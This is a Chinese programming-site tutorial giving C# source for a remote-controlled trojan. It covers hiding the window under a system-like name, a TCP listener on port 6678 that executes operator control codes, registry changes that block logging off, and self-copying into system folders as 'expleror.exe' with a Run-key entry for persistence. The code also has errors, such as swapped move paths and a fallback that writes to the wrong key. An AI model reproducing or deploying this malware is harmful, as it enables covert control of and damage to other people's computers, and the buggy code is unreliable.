欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

基于C#实现的木马程序实例详解

程序员文章站 2024-02-21 12:28:28
本文以c#为例讲解木马程序的实现过程。要实现木马服务的程序,主要实现以下几个功能:后台的运行(隐藏技术),控制码的接收与注册表的修改,下面就针对这三方面做介绍: 1、在c...

本文以c#为例讲解木马程序的实现过程。要实现木马服务的程序,主要实现以下几个功能:后台的运行(隐藏技术),控制码的接收注册表的修改,下面就针对这三方面做介绍:

1、在c#中,建立一个后台服务程序是很容易的,先建立一个新的c#的windows应用程序,项目名称自定(不过为了隐藏可使用与系统相近的名称,如svchost.exe等),将窗体属性"showintaskbar"属性设为false,让它运行时不会在任务栏中显示,并将属性"windowstate"属性设为mininized即可,这样窗体就可以隐藏运行了。当然你也可以在initializecomponent()设置,此函数起初始化的作用,在窗体显示前运行,代码如下:

private void initializecomponent()
{
//
// form1
//
//窗体显示的起点和大小
this.autoscalebasesize = new system.drawing.size(6, 14);
this.clientsize = new system.drawing.size(368, 357);
//窗体名称
this.name = "form1";
//设置属性让它后台运行
this.showintaskbar = false;
this.text = "form1";
this.windowstate = system.windows.forms.formwindowstate.minimized;
}

2、控制代码的接收,必需在服务程序运行开始就启动,所以侦听线程必需在程序初始化中启动,所以放在窗体的构造函数中,代码注解如下:

public form1() //窗体的构造函数
{
//
// windows 窗体设计器支持所必需的
//
initializecomponent();
//
// todo: 在 initializecomponent 调用后添加任何构造函数代码
//加入你的侦听代码
//端口你可以自已设定,我使用了固定的端口
int port =6678;
//system.net.sockets.tcplistener是用来在tcp网络中侦听客户端的
listener = new tcplistener(port);
//启动侦听
listener.start();
//增加接收控制码的线程,如果要停止线程可以用 thread.abort()
//recontrolcode 是线程启动执行的函数,此函数根据接收的控制
//控制码选取合适的注册表修改函数
thread thread = new thread(new threadstart(recontrolcode));
thread.start();
}

recontrolcode函数如下,完整代码见程序:

private void recontrolcode()
{
//设置接收套接字,接收listener.acceptsocket是返回已经接收的客户的请求
socket = listener.acceptsocket();
//如果连接成功执行
while (socket.connected)
{
//接收控制码
byte [] by =new byte[6];
int i = socket.receive(by,by.length ,0);
string ss = system.text.encoding.ascii.getstring(by);
//根据控制码执行不同的功能
//修改注册表加入编码
switch (ss)
{
case "jiance"://测试连接,返回测试信息
string str ="hjc";
byte [] bytee = system.text.encoding.ascii.getbytes(str);
socket.send(bytee,0,bytee.length,0);
break;
case "zx1000":
//修改注册表函数,自已定义,见下面分析
unlogoff();
//返回控制消息
retmessage();
break;
case "zx0100":
//修改注册表函数
unclose();
//返回控制消息
retmessage();
break;
//重复的case功能与前面一样,略掉
default:
break;
}//case
}//while
} //private void recontrolcode

3、c#中实现注册表的修改,使用了。net类库中的system.microsoft.win32命令空间,它提供两种类型的类:处理由操作系统引发的事件的类和对系统注册表进行操作的类。下面就可以看到它的用法。这里我做了一个修改注册表的子程序:使计算机不能注销。在这之前先了解注册表,在子键software//microsoft//windows//currentversion//policies//explorer
下面设键值nologoff 为 1 即可使计算机无法注销。在下面的函数中用c#实现对注册表的修改:

private void unlogoff()
{
//得到主机的注册表的*节点
microsoft.win32.registrykey rlocal = registry.localmachine;
//设置一个注册表子键的变量
registrykey key1;
try
{
//函数registrykey.opensubkey(string registrykey,bool canwrite)检索指定的子键
//registrykey是用户指定的键值,canwrite 为true则可修改,默认为fasle不可改
key1 =
rlocal.opensubkey("software//microsoft//windows//currentversion//policies//explorer",true);
//设置子键的键名,和值
key1.setvalue ("nologoff",1);
//关闭打开的子键
key1.close();
//警告字符串设定
mystr = mystr +"hkey_local_machine//software//microsoft//windows//currentversion//policies//explorer键值nologoff被修改!请将它置为0!";
}
catch{}
//如果不存在自已建立
if(key1 ==null)
{
try
{
//使用registrykey.createsubkey(string mystring)函数来建立你需要的子键
registrykey key2 = rlocal.createsubkey("software//microsoft//windows//currentversion//policies//explorer");
key2.setvalue("nologoff",1);
key2.close();
mystr = mystr +"hkey_local_machine//software//microsoft//windows//currentversion//policies//explorer键值nologoff被修改!请将它置为0!";
}
catch{}
}
}

4、在木马程序中还有一个重要的功能就是自我的复制和转移。木马引入被控制的主机时必需自动将木马隐藏在system,system32的目录下以防被发现。转移的代码分析如下,主要实现的功能是将d盘下的木马程序转移到c://winnnt//system//msdoss.exe,同时换名称。使用的。net命名空间system.io,它的作用是允许对数据流和文件进行同步和异步读写。这里我们使用了system.io.file类。

private void movecc1()
{
try
{
//函数file.move(string sourcefilename,string destfilename)起移动文件的作用
//sourcefilename为要移动的文件名,destfilename为文件的新路径
file.move("c://winnnt//system//msdoss.exe","d://winnt//system32//expleror.exe");
}
catch {}
//将新移的木马程序设为自启动。分析和前面一样
try
{
key1 = rlocal.opensubkey("software//microsoft//windows//currentversion//run",true);
key1.setvalue ("microsoftt","d://winnt//system32//expleror.exe");
key1.close();
}
catch{}
if(key1 ==null)
{
try
{
registrykey key2=rlocal.createsubkey("software//microsoft//windows//currentversion//run");
key1.setvalue ("microsoftt","d://winnt//system32//expleror.exe");
key1.close();
}
catch{}
}
} //movecc1()